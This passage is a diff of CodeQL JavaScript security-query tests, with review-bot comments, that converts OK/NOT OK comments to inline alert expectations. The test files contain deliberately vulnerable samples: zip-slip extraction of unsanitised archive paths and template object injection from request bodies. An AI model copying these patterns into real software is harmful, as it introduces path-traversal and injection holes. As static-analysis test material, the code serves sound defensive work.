ZipSlipBad.js:22:22:22:31 | entry.path | ZipSlipBad.js:22:11:22:31 | fileName | provenance | | -| ZipSlipBad.js:30:14:30:17 | name | ZipSlipBad.js:31:26:31:29 | name | provenance | | -| ZipSlipBad.js:34:16:34:19 | name | ZipSlipBad.js:35:26:35:29 | name | provenance | | -| ZipSlipBadUnzipper.js:7:9:7:29 | fileName | ZipSlipBadUnzipper.js:8:37:8:44 | fileName | provenance | | -| ZipSlipBadUnzipper.js:7:20:7:29 | entry.path | ZipSlipBadUnzipper.js:7:9:7:29 | fileName | provenance | | subpaths -#select -| AdmZipBad.js:6:24:6:41 | zipEntry.entryName | AdmZipBad.js:6:24:6:41 | zipEntry.entryName | AdmZipBad.js:6:24:6:41 | zipEntry.entryName | Unsanitized archive entry, which may contain '..', is used in a $@. 
| AdmZipBad.js:6:24:6:41 | zipEntry.entryName | file system operation | -| TarSlipBad.js:6:36:6:46 | header.name | TarSlipBad.js:6:36:6:46 | header.name | TarSlipBad.js:6:36:6:46 | header.name | Unsanitized archive entry, which may contain '..', is used in a $@. | TarSlipBad.js:6:36:6:46 | header.name | file system operation | -| TarSlipBad.js:9:17:9:31 | header.linkname | TarSlipBad.js:9:17:9:31 | header.linkname | TarSlipBad.js:9:17:9:31 | header.linkname | Unsanitized archive entry, which may contain '..', is used in a $@. | TarSlipBad.js:9:17:9:31 | header.linkname | file system operation | -| ZipSlipBad2.js:5:37:5:46 | entry.path | ZipSlipBad2.js:5:37:5:46 | entry.path | ZipSlipBad2.js:6:22:6:29 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad2.js:6:22:6:29 | fileName | file system operation | -| ZipSlipBad.js:7:22:7:31 | entry.path | ZipSlipBad.js:7:22:7:31 | entry.path | ZipSlipBad.js:8:37:8:44 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:8:37:8:44 | fileName | file system operation | -| ZipSlipBad.js:15:22:15:31 | entry.path | ZipSlipBad.js:15:22:15:31 | entry.path | ZipSlipBad.js:16:30:16:37 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:16:30:16:37 | fileName | file system operation | -| ZipSlipBad.js:22:22:22:31 | entry.path | ZipSlipBad.js:22:22:22:31 | entry.path | ZipSlipBad.js:23:28:23:35 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:23:28:23:35 | fileName | file system operation | -| ZipSlipBad.js:30:14:30:17 | name | ZipSlipBad.js:30:14:30:17 | name | ZipSlipBad.js:31:26:31:29 | name | Unsanitized archive entry, which may contain '..', is used in a $@. 
| ZipSlipBad.js:31:26:31:29 | name | file system operation | -| ZipSlipBad.js:34:16:34:19 | name | ZipSlipBad.js:34:16:34:19 | name | ZipSlipBad.js:35:26:35:29 | name | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:35:26:35:29 | name | file system operation | -| ZipSlipBadUnzipper.js:7:20:7:29 | entry.path | ZipSlipBadUnzipper.js:7:20:7:29 | entry.path | ZipSlipBadUnzipper.js:8:37:8:44 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBadUnzipper.js:8:37:8:44 | fileName | file system operation | diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlip.qlref b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlip.qlref index 0ac6382f48ab..921be7872bbf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlip.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlip.qlref @@ -1 +1,2 @@ -Security/CWE-022/ZipSlip.ql +query: Security/CWE-022/ZipSlip.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js index 0146533c6dca..e7ad3b8e264d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad.js 
@@ -4,35 +4,35 @@ const unzip = require('unzip'); fs.createReadStream('archive.zip') .pipe(unzip.Parse()) .on('entry', entry => { - const fileName = entry.path; - entry.pipe(fs.createWriteStream(fileName)); + const fileName = entry.path; // $ Alert + entry.pipe(fs.createWriteStream(fileName)); // $ Sink }); var Writer = require('fstream').Writer; fs.createReadStream('archive.zip') .pipe(unzip.Parse()) .on('entry', entry => { - const fileName = entry.path; - entry.pipe(Writer({path: fileName})); + const fileName = entry.path; // $ Alert + entry.pipe(Writer({path: fileName})); // $ Sink }); fs.createReadStream('archive.zip') .pipe(unzip.Parse()) .on('entry', entry => { - const fileName = entry.path; - var file = fs.openSync(fileName, "w"); + const fileName = entry.path; // $ Alert + var file = fs.openSync(fileName, "w"); // $ Sink }); const JSZip = require('jszip'); const zip = new JSZip(); const path = require('path'); function doZipSlip() { - for (const name in zip.files) { - fs.createWriteStream(name); + for (const name in zip.files) { // $ Alert + fs.createWriteStream(name); // $ Sink } - zip.forEach((name, file) => { - fs.createWriteStream(name); + zip.forEach((name, file) => { // $ Alert + fs.createWriteStream(name); // $ Sink }); const extractTo = path.resolve("/some/path/to/extract/to"); @@ -50,6 +50,6 @@ function doZipSlip() { files.push(name); } for (const file of files) { - fs.createWriteStream(path.join(extractTo, file)); // OK + fs.createWriteStream(path.join(extractTo, file)); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js index d582c680ef8e..7c110ea95aa1 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBad2.js 
@@ -2,7 +2,7 @@ var fs = require('fs'); var unzip = require('unzip'); fs.readFile('path/to/archive.zip', function (err, zipContents) { unzip.Parse(zipContents).on('entry', function (entry) { - var fileName = 'output/path/' + entry.path; - fs.writeFileSync(fileName, entry.contents); + var fileName = 'output/path/' + entry.path; // $ Alert + fs.writeFileSync(fileName, entry.contents); // $ Sink }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js index 239b3df895d5..064bc58e25a2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipBadUnzipper.js @@ -4,6 +4,6 @@ const unzipper = require('unzipper'); fs.createReadStream('path/to/archive.zip') .pipe(unzipper.Parse()) .on('entry', function (entry) { - var fileName = entry.path; - entry.pipe(fs.createWriteStream(fileName)); + var fileName = entry.path; // $ Alert + entry.pipe(fs.createWriteStream(fileName)); // $ Sink }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js index 07918647e6f0..45e4ced8380b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlipGood.js @@ -26,7 +26,7 @@ fs.createReadStream('archive.zip') } if (!fileName.startsWith(".")) { - entry.pipe(fs.createWriteStream(fileName)); // OK. + entry.pipe(fs.createWriteStream(fileName)); } }); @@ -35,5 +35,5 @@ fs.createReadStream('archive.zip') .on('entry', entry => { const fileName = path.normalize(entry.path); - entry.pipe(fs.createWriteStream(path.basename(fileName))); // OK. + entry.pipe(fs.createWriteStream(path.basename(fileName))); }); 
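Review bot: With `// OK.` removed, the two `fs.createWriteStream` calls in ZipSlipGood.js give no hint of why no alert is expected, so an intentionally clean line now reads the same as a forgotten annotation. In the second hunk the reason is visible, and a plain comment such as `// OK - path.basename strips directory components` would document it without acting as an expectation; the commit keeps `// OK - …` comments of this form in tainted-sendFile.js. For the first hunk (`if (!fileName.startsWith("."))`) the callback starts above the hunk, so the comment should name whichever earlier check the test relies on, which is not visible from here.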
diff --git a/javascript/ql/test/query-tests/Security/CWE-073/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-073/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql deleted file mode 100644 index eae82dc052fe..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql +++ /dev/null @@ -1,3 +0,0 @@ -import javascript -import semmle.javascript.security.dataflow.TemplateObjectInjectionQuery -deprecated import utils.test.ConsistencyChecking diff --git a/javascript/ql/test/query-tests/Security/CWE-073/TemplateObjectInjection.expected b/javascript/ql/test/query-tests/Security/CWE-073/TemplateObjectInjection.expected index 8be388d5ad97..32b2875a86cf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/TemplateObjectInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-073/TemplateObjectInjection.expected 
@@ -1,3 +1,43 @@ +#select +| routes.js:2:23:2:30 | req.body | routes.js:2:23:2:30 | req.body | routes.js:2:23:2:30 | req.body | Template object depends on a $@. | routes.js:2:23:2:30 | req.body | user-provided value | +| tst2.js:7:28:7:40 | bodyParameter | tst2.js:6:25:6:32 | req.body | tst2.js:7:28:7:40 | bodyParameter | Template object depends on a $@. | tst2.js:6:25:6:32 | req.body | user-provided value | +| tst2.js:27:28:27:40 | bodyParameter | tst2.js:26:25:26:32 | req.body | tst2.js:27:28:27:40 | bodyParameter | Template object depends on a $@. | tst2.js:26:25:26:32 | req.body | user-provided value | +| tst2.js:35:28:35:40 | bodyParameter | tst2.js:34:25:34:32 | req.body | tst2.js:35:28:35:40 | bodyParameter | Template object depends on a $@. | tst2.js:34:25:34:32 | req.body | user-provided value | +| tst2.js:43:28:43:40 | bodyParameter | tst2.js:42:25:42:32 | req.body | tst2.js:43:28:43:40 | bodyParameter | Template object depends on a $@. | tst2.js:42:25:42:32 | req.body | user-provided value | +| tst2.js:52:28:52:40 | bodyParameter | tst2.js:51:25:51:32 | req.body | tst2.js:52:28:52:40 | bodyParameter | Template object depends on a $@. | tst2.js:51:25:51:32 | req.body | user-provided value | +| tst.js:10:28:10:40 | bodyParameter | tst.js:7:25:7:32 | req.body | tst.js:10:28:10:40 | bodyParameter | Template object depends on a $@. | tst.js:7:25:7:32 | req.body | user-provided value | +| tst.js:11:28:11:41 | queryParameter | tst.js:8:26:8:49 | req.que ... rameter | tst.js:11:28:11:41 | queryParameter | Template object depends on a $@. | tst.js:8:26:8:49 | req.que ... rameter | user-provided value | +| tst.js:24:28:24:30 | obj | tst.js:8:26:8:49 | req.que ... rameter | tst.js:24:28:24:30 | obj | Template object depends on a $@. | tst.js:8:26:8:49 | req.que ... rameter | user-provided value | +| tst.js:29:28:29:42 | JSON.parse(str) | tst.js:8:26:8:49 | req.que ... rameter | tst.js:29:28:29:42 | JSON.parse(str) | Template object depends on a $@. 
| tst.js:8:26:8:49 | req.que ... rameter | user-provided value | +edges +| tst2.js:6:9:6:46 | bodyParameter | tst2.js:7:28:7:40 | bodyParameter | provenance | | +| tst2.js:6:25:6:32 | req.body | tst2.js:6:25:6:46 | req.bod ... rameter | provenance | Config | +| tst2.js:6:25:6:46 | req.bod ... rameter | tst2.js:6:9:6:46 | bodyParameter | provenance | | +| tst2.js:26:9:26:46 | bodyParameter | tst2.js:27:28:27:40 | bodyParameter | provenance | | +| tst2.js:26:25:26:32 | req.body | tst2.js:26:25:26:46 | req.bod ... rameter | provenance | Config | +| tst2.js:26:25:26:46 | req.bod ... rameter | tst2.js:26:9:26:46 | bodyParameter | provenance | | +| tst2.js:34:9:34:46 | bodyParameter | tst2.js:35:28:35:40 | bodyParameter | provenance | | +| tst2.js:34:25:34:32 | req.body | tst2.js:34:25:34:46 | req.bod ... rameter | provenance | Config | +| tst2.js:34:25:34:46 | req.bod ... rameter | tst2.js:34:9:34:46 | bodyParameter | provenance | | +| tst2.js:42:9:42:46 | bodyParameter | tst2.js:43:28:43:40 | bodyParameter | provenance | | +| tst2.js:42:25:42:32 | req.body | tst2.js:42:25:42:46 | req.bod ... rameter | provenance | Config | +| tst2.js:42:25:42:46 | req.bod ... rameter | tst2.js:42:9:42:46 | bodyParameter | provenance | | +| tst2.js:51:9:51:46 | bodyParameter | tst2.js:52:28:52:40 | bodyParameter | provenance | | +| tst2.js:51:25:51:32 | req.body | tst2.js:51:25:51:46 | req.bod ... rameter | provenance | Config | +| tst2.js:51:25:51:46 | req.bod ... rameter | tst2.js:51:9:51:46 | bodyParameter | provenance | | +| tst.js:7:9:7:46 | bodyParameter | tst.js:10:28:10:40 | bodyParameter | provenance | | +| tst.js:7:25:7:32 | req.body | tst.js:7:25:7:46 | req.bod ... rameter | provenance | Config | +| tst.js:7:25:7:46 | req.bod ... 
rameter | tst.js:7:9:7:46 | bodyParameter | provenance | | +| tst.js:8:9:8:49 | queryParameter | tst.js:11:28:11:41 | queryParameter | provenance | | +| tst.js:8:9:8:49 | queryParameter | tst.js:20:19:20:32 | queryParameter | provenance | | +| tst.js:8:26:8:49 | req.que ... rameter | tst.js:8:9:8:49 | queryParameter | provenance | | +| tst.js:20:19:20:32 | queryParameter | tst.js:23:24:23:26 | obj | provenance | | +| tst.js:23:24:23:26 | obj | tst.js:24:28:24:30 | obj | provenance | | +| tst.js:23:24:23:26 | obj | tst.js:26:17:26:19 | obj | provenance | | +| tst.js:26:11:26:24 | str | tst.js:29:39:29:41 | str | provenance | | +| tst.js:26:17:26:19 | obj | tst.js:26:17:26:24 | obj + "" | provenance | Config | +| tst.js:26:17:26:24 | obj + "" | tst.js:26:11:26:24 | str | provenance | | +| tst.js:29:39:29:41 | str | tst.js:29:28:29:42 | JSON.parse(str) | provenance | Config | nodes | routes.js:2:23:2:30 | req.body | semmle.label | req.body | | tst2.js:6:9:6:46 | bodyParameter | semmle.label | bodyParameter | 
@@ -35,44 +75,4 @@ nodes | tst.js:26:17:26:24 | obj + "" | semmle.label | obj + "" | | tst.js:29:28:29:42 | JSON.parse(str) | semmle.label | JSON.parse(str) | | tst.js:29:39:29:41 | str | semmle.label | str | -edges -| tst2.js:6:9:6:46 | bodyParameter | tst2.js:7:28:7:40 | bodyParameter | provenance | | -| tst2.js:6:25:6:32 | req.body | tst2.js:6:25:6:46 | req.bod ... rameter | provenance | Config | -| tst2.js:6:25:6:46 | req.bod ... rameter | tst2.js:6:9:6:46 | bodyParameter | provenance | | -| tst2.js:26:9:26:46 | bodyParameter | tst2.js:27:28:27:40 | bodyParameter | provenance | | -| tst2.js:26:25:26:32 | req.body | tst2.js:26:25:26:46 | req.bod ... rameter | provenance | Config | -| tst2.js:26:25:26:46 | req.bod ... rameter | tst2.js:26:9:26:46 | bodyParameter | provenance | | -| tst2.js:34:9:34:46 | bodyParameter | tst2.js:35:28:35:40 | bodyParameter | provenance | | -| tst2.js:34:25:34:32 | req.body | tst2.js:34:25:34:46 | req.bod ... rameter | provenance | Config | -| tst2.js:34:25:34:46 | req.bod ... rameter | tst2.js:34:9:34:46 | bodyParameter | provenance | | -| tst2.js:42:9:42:46 | bodyParameter | tst2.js:43:28:43:40 | bodyParameter | provenance | | -| tst2.js:42:25:42:32 | req.body | tst2.js:42:25:42:46 | req.bod ... rameter | provenance | Config | -| tst2.js:42:25:42:46 | req.bod ... rameter | tst2.js:42:9:42:46 | bodyParameter | provenance | | -| tst2.js:51:9:51:46 | bodyParameter | tst2.js:52:28:52:40 | bodyParameter | provenance | | -| tst2.js:51:25:51:32 | req.body | tst2.js:51:25:51:46 | req.bod ... rameter | provenance | Config | -| tst2.js:51:25:51:46 | req.bod ... rameter | tst2.js:51:9:51:46 | bodyParameter | provenance | | -| tst.js:7:9:7:46 | bodyParameter | tst.js:10:28:10:40 | bodyParameter | provenance | | -| tst.js:7:25:7:32 | req.body | tst.js:7:25:7:46 | req.bod ... rameter | provenance | Config | -| tst.js:7:25:7:46 | req.bod ... 
rameter | tst.js:7:9:7:46 | bodyParameter | provenance | | -| tst.js:8:9:8:49 | queryParameter | tst.js:11:28:11:41 | queryParameter | provenance | | -| tst.js:8:9:8:49 | queryParameter | tst.js:20:19:20:32 | queryParameter | provenance | | -| tst.js:8:26:8:49 | req.que ... rameter | tst.js:8:9:8:49 | queryParameter | provenance | | -| tst.js:20:19:20:32 | queryParameter | tst.js:23:24:23:26 | obj | provenance | | -| tst.js:23:24:23:26 | obj | tst.js:24:28:24:30 | obj | provenance | | -| tst.js:23:24:23:26 | obj | tst.js:26:17:26:19 | obj | provenance | | -| tst.js:26:11:26:24 | str | tst.js:29:39:29:41 | str | provenance | | -| tst.js:26:17:26:19 | obj | tst.js:26:17:26:24 | obj + "" | provenance | Config | -| tst.js:26:17:26:24 | obj + "" | tst.js:26:11:26:24 | str | provenance | | -| tst.js:29:39:29:41 | str | tst.js:29:28:29:42 | JSON.parse(str) | provenance | Config | subpaths -#select -| routes.js:2:23:2:30 | req.body | routes.js:2:23:2:30 | req.body | routes.js:2:23:2:30 | req.body | Template object depends on a $@. | routes.js:2:23:2:30 | req.body | user-provided value | -| tst2.js:7:28:7:40 | bodyParameter | tst2.js:6:25:6:32 | req.body | tst2.js:7:28:7:40 | bodyParameter | Template object depends on a $@. | tst2.js:6:25:6:32 | req.body | user-provided value | -| tst2.js:27:28:27:40 | bodyParameter | tst2.js:26:25:26:32 | req.body | tst2.js:27:28:27:40 | bodyParameter | Template object depends on a $@. | tst2.js:26:25:26:32 | req.body | user-provided value | -| tst2.js:35:28:35:40 | bodyParameter | tst2.js:34:25:34:32 | req.body | tst2.js:35:28:35:40 | bodyParameter | Template object depends on a $@. | tst2.js:34:25:34:32 | req.body | user-provided value | -| tst2.js:43:28:43:40 | bodyParameter | tst2.js:42:25:42:32 | req.body | tst2.js:43:28:43:40 | bodyParameter | Template object depends on a $@. 
| tst2.js:42:25:42:32 | req.body | user-provided value | -| tst2.js:52:28:52:40 | bodyParameter | tst2.js:51:25:51:32 | req.body | tst2.js:52:28:52:40 | bodyParameter | Template object depends on a $@. | tst2.js:51:25:51:32 | req.body | user-provided value | -| tst.js:10:28:10:40 | bodyParameter | tst.js:7:25:7:32 | req.body | tst.js:10:28:10:40 | bodyParameter | Template object depends on a $@. | tst.js:7:25:7:32 | req.body | user-provided value | -| tst.js:11:28:11:41 | queryParameter | tst.js:8:26:8:49 | req.que ... rameter | tst.js:11:28:11:41 | queryParameter | Template object depends on a $@. | tst.js:8:26:8:49 | req.que ... rameter | user-provided value | -| tst.js:24:28:24:30 | obj | tst.js:8:26:8:49 | req.que ... rameter | tst.js:24:28:24:30 | obj | Template object depends on a $@. | tst.js:8:26:8:49 | req.que ... rameter | user-provided value | -| tst.js:29:28:29:42 | JSON.parse(str) | tst.js:8:26:8:49 | req.que ... rameter | tst.js:29:28:29:42 | JSON.parse(str) | Template object depends on a $@. | tst.js:8:26:8:49 | req.que ... rameter | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-073/TemplateObjectInjection.qlref b/javascript/ql/test/query-tests/Security/CWE-073/TemplateObjectInjection.qlref index 28d1b81c5d40..a6487dea1574 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/TemplateObjectInjection.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-073/TemplateObjectInjection.qlref @@ -1 +1,2 @@ -Security/CWE-073/TemplateObjectInjection.ql +query: Security/CWE-073/TemplateObjectInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-073/routes.js b/javascript/ql/test/query-tests/Security/CWE-073/routes.js index 2bfbad7cd37b..07e03fc0f404 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/routes.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/routes.js 
@@ -1,3 +1,3 @@ exports.foo = function(req, res) { - res.render('foo', req.body); // NOT OK + res.render('foo', req.body); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-073/tst.js b/javascript/ql/test/query-tests/Security/CWE-073/tst.js index ee2bff5f0e78..04422c253a0c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-073/tst.js @@ -4,29 +4,29 @@ app.set('view engine', 'hbs'); app.use(require('body-parser').json()); app.use(require('body-parser').urlencoded({ extended: false })); app.post('/path', function(req, res) { - var bodyParameter = req.body.bodyParameter; - var queryParameter = req.query.queryParameter; + var bodyParameter = req.body.bodyParameter; // $ Source + var queryParameter = req.query.queryParameter; // $ Source - res.render('template', bodyParameter); // NOT OK - res.render('template', queryParameter); // NOT OK + res.render('template', bodyParameter); // $ Alert + res.render('template', queryParameter); // $ Alert if (typeof bodyParameter === "string") { - res.render('template', bodyParameter); // OK + res.render('template', bodyParameter); } - res.render('template', queryParameter + ""); // OK + res.render('template', queryParameter + ""); - res.render('template', {profile: bodyParameter}); // OK + res.render('template', {profile: bodyParameter}); indirect(res, queryParameter); }); function indirect(res, obj) { - res.render("template", obj); // NOT OK + res.render("template", obj); // $ Alert const str = obj + ""; - res.render("template", str); // OK + res.render("template", str); - res.render("template", JSON.parse(str)); // NOT OK + res.render("template", JSON.parse(str)); // $ Alert } let routes = require('./routes'); diff --git a/javascript/ql/test/query-tests/Security/CWE-073/tst2.js b/javascript/ql/test/query-tests/Security/CWE-073/tst2.js index 6cb626fd7c1c..5e0168f0707c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-073/tst2.js 
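Review bot: With the `// OK` markers dropped in tst.js, the unflagged `res.render` calls (inside the `typeof bodyParameter === "string"` guard, with `queryParameter + ""`, with `{profile: bodyParameter}`, and `res.render("template", str)` in `indirect`) no longer say that they are deliberate negative cases, in a file that interleaves them with `// $ Alert` lines. From the code, each appears safe because the template receives a string or a fresh object literal rather than a request-shaped object. A plain comment would record that, e.g. `// no alert: typeof guard narrows bodyParameter to a string`, assuming the inline-expectations postprocessor only parses comments that begin with `$`. The same applies to the `app2` and `app3` handlers in tst2.js, whose only visible difference from the flagged handlers is the view-engine setup (none for `app2`, `pug` for `app3`); something like `// no alert: presumably pug is not modelled as an affected engine` would make the intent explicit. The start of tst.js lies outside the hunk, so an existing header comment covering this cannot be ruled out.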
+++ b/javascript/ql/test/query-tests/Security/CWE-073/tst2.js 
@@ -3,44 +3,44 @@ var app = require('express')(); app.engine( '.hbs', handlebars({ defaultLayout: 'main', extname: '.hbs' }) ); app.set('view engine', '.hbs') app.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + var bodyParameter = req.body.bodyParameter; // $ Source + res.render('template', bodyParameter); // $ Alert }); var app2 = require('express')(); app2.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // OK + res.render('template', bodyParameter); }); var app3 = require('express')(); app3.set('view engine', 'pug'); app3.post('/path', require('body-parser').json(), function(req, res) { var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // OK + res.render('template', bodyParameter); }); var app4 = require('express')(); app4.set('view engine', 'ejs'); app4.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + var bodyParameter = req.body.bodyParameter; // $ Source + res.render('template', bodyParameter); // $ Alert }); var app5 = require('express')(); app5.engine("foobar", require("consolidate").whiskers); app5.set('view engine', 'foobar'); app5.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + var bodyParameter = req.body.bodyParameter; // $ Source + res.render('template', bodyParameter); // $ Alert }); var app6 = require('express')(); app6.register(".html", require("consolidate").whiskers); app6.set('view engine', 'html'); app6.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + 
var bodyParameter = req.body.bodyParameter; // $ Source + res.render('template', bodyParameter); // $ Alert }); const express = require('express'); @@ -48,7 +48,7 @@ var router = express.Router(); var app7 = express(); app7.set('view engine', 'ejs'); router.post('/path', require('body-parser').json(), function(req, res) { - var bodyParameter = req.body.bodyParameter; - res.render('template', bodyParameter); // NOT OK + var bodyParameter = req.body.bodyParameter; // $ Source + res.render('template', bodyParameter); // $ Alert }); app7.use("/router", router); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/CommandInjection.expected b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/CommandInjection.expected index e8d95064b8e1..b68d40a540dd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/CommandInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/CommandInjection.expected 
@@ -1,3 +1,55 @@ +#select +| actions.js:9:8:9:22 | `echo ${title}` | actions.js:8:17:8:57 | github. ... t.title | actions.js:9:8:9:22 | `echo ${title}` | This command line depends on a $@. | actions.js:8:17:8:57 | github. ... t.title | user-provided value | +| actions.js:19:14:19:31 | `echo ${head_ref}` | actions.js:18:20:18:63 | github. ... ead.ref | actions.js:19:14:19:31 | `echo ${head_ref}` | This command line depends on a $@. | actions.js:18:20:18:63 | github. ... ead.ref | user-provided value | +| child_process-test.js:17:13:17:15 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:17:13:17:15 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:18:17:18:19 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:18:17:18:19 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:19:17:19:19 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:19:17:19:19 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:20:21:20:23 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:20:21:20:23 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:21:14:21:16 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:21:14:21:16 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:22:18:22:20 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:22:18:22:20 | cmd | This command line depends on a $@. 
| child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:23:13:23:15 | cmd | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:23:13:23:15 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:25:13:25:31 | "foo" + cmd + "bar" | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:25:13:25:31 | "foo" + cmd + "bar" | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:39:5:39:31 | cp.spaw ... cmd ]) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:39:26:39:28 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:44:5:44:34 | cp.exec ... , args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:43:15:43:17 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:54:5:54:39 | cp.exec ... , args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:53:15:53:17 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:56:5:56:59 | cp.spaw ... cmd])) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:56:25:56:58 | ['/C', ... , cmd]) | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:56:5:56:59 | cp.spaw ... cmd])) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:56:54:56:56 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:57:5:57:50 | cp.spaw ... t(cmd)) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:6:15:6:49 | url.par ... 
ry.path | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:57:5:57:50 | cp.spaw ... t(cmd)) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:57:25:57:49 | ['/C', ... at(cmd) | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:67:3:67:21 | cp.spawn(cmd, args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:48:15:48:17 | cmd | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:67:3:67:21 | cp.spawn(cmd, args) | child_process-test.js:6:25:6:31 | req.url | child_process-test.js:66:19:66:22 | args | This command line depends on a $@. | child_process-test.js:6:25:6:31 | req.url | user-provided value | +| child_process-test.js:75:29:75:31 | cmd | child_process-test.js:73:25:73:31 | req.url | child_process-test.js:75:29:75:31 | cmd | This command line depends on a $@. | child_process-test.js:73:25:73:31 | req.url | user-provided value | +| child_process-test.js:83:19:83:36 | req.query.fileName | child_process-test.js:83:19:83:36 | req.query.fileName | child_process-test.js:83:19:83:36 | req.query.fileName | This command line depends on a $@. | child_process-test.js:83:19:83:36 | req.query.fileName | user-provided value | +| 